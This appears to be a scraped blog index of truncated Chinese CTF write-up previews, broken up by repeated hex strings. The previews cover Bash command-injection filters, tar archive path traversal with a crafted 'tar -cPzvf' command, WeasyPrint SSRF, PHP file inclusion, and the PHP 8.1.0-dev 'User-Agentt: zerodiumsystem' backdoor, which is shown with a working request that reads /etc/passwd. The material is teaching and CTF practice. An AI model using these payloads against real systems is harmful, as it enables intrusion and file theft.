ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
Linux
未读参考文章: Web-Bash-Vino0o0o 34c3 CTF minbashmaxfun writeup. TL;DR | by Ori Kadosh | Medium 安洵杯的Bash 开题得到源代码 123456789101112131415<?phphighlight_file(__FILE__);if(isset($_POST["cmd"])){ $test = $_POST['cmd']; $white_list = str_split('${#}\\(<)\'0'); $char_list = str_split($test); foreach($char_list as $c){ if(!in_array($c,$white_list)){ die("Cyzcc"); } } exec($ ...
Linux
before all
在安全中,通过压缩包我们可以实现什么呢? 可以实现目录穿越,进而覆盖解压目录之外的文件。
how_to_use
#Python/3.11.1
import tarfile
import sys
tar = tarfile.open(sys.argv[1], "r")
tar.extractall()#解压缩包
tar解压目录穿越
tar 命令可以在打包的时候把路径也打包进去,那么对于解压,是不是也可以指定目录解压?(目录穿越) 我在自己的主机上执行:
tar -cPzvf end.tar.gz xxx/../../../var/www/html/xxx.xxx
此时在本机生成了自己的end.tar.gz压缩文件。当在其他机器上解压此文件,会不会在/var/www/html/目录下生成xxx.xxx呢? 经过测试,很多场景都存在这种情况。(是否受影响取决于解压一方:上面的 tar.extractall() 没有对成员路径做任何校验;解压前应拒绝绝对路径和含 .. 的成员,较新的 Python 可使用 extractall(filter='data')。) Java:Java.util.zip、zt-zip ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
[NSSRound#20 Basic]CSDN_To_PDF V1.2
开题是一个pdf转换器,题目提示是csdn的,猜测是针对csdn有所过滤,尝试监听一下。抓包,发现是python的,然后再监听一下,得到weasyprint。找到其漏洞实现ssrf;这里还过滤了html,可以在自己的服务端把内容直接放在index.html里,绕过对html的过滤。得到pdf之后使用binwalk分离一下就好,找到flag
[NUSTCTF 2022 新生赛]Translate
开题是一个简单的页面,查看源代码,下面有神秘的字符串,base64解码得到/test.php,得到一部分代码
<?php
include_once("fun.php");
//我的室友板鸭把flag藏到flag.php里了
highlight_file(__FILE__);
error_reporting(0);
$file = $_GET['file'];
if (!is_file($file)) {
    highlight_file(filt ...
PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。(该后门只存在于当时的开发版源码中,没有进入正式发布版本;排查时可确认运行的是否为这一时期构建的 8.1.0-dev,并在流量中留意 User-Agentt 这个多了一个 t 的请求头。) 废洞一个,这里使用 **[NSSRound#18 Basic]Becomeroot** 复现
验证漏洞存在
GET / HTTP/1.1
Host: node4.anna.nssctf.cn:28189
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0
User-Agentt: zerodiumsystem("cat /etc/passwd");
Accept: text/html,application/xhtml+xml ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...
prize_p612345678910111213141516171819202122232425262728293031323334353637<?phpfunction x(){ exit();}if(isset($_GET['f'])){ $content = $_GET['content']; if (preg_match('/index|function|x|iconv|UCS|UTF|rot|zlib|quoted|base64|%|toupper|tolower|strip_tags|dechunk|\.\./i', $content)) { die('hacker'); } if ($_GET['f'] == "create"){ file_put_contents($content, '<?=x();?>& ...
ffbe0419857d4d8b38a660c9d071e2f099e2bcdb673849c2cb83a442adcbd53cc468d0c72594e5b280b549d5293adc15ff638badd6a26b36c101080c573fc8c0e4a8a05bc9b7534c77a0df7f7b80979d7945186aba8b98b7d1523fcbf559ee97e27e0df97117a4876e471fc52d6c36414511ff9095759d03fecd428771f1a651f63c6da9d5f9c55b55037e4f918e47f40020d0e4456755c287ae16e83424e333475c38c0a38040fcc4047cd8e8e33aaee3a7ef29e949eec3a6b9ede34077211191388adcfd23b4479b557f3aae6e6c21ac32ce696931bcd615a8f54005d5f661984732dab1433bec4f40c54e807a9b9ff03c289596c38914a ...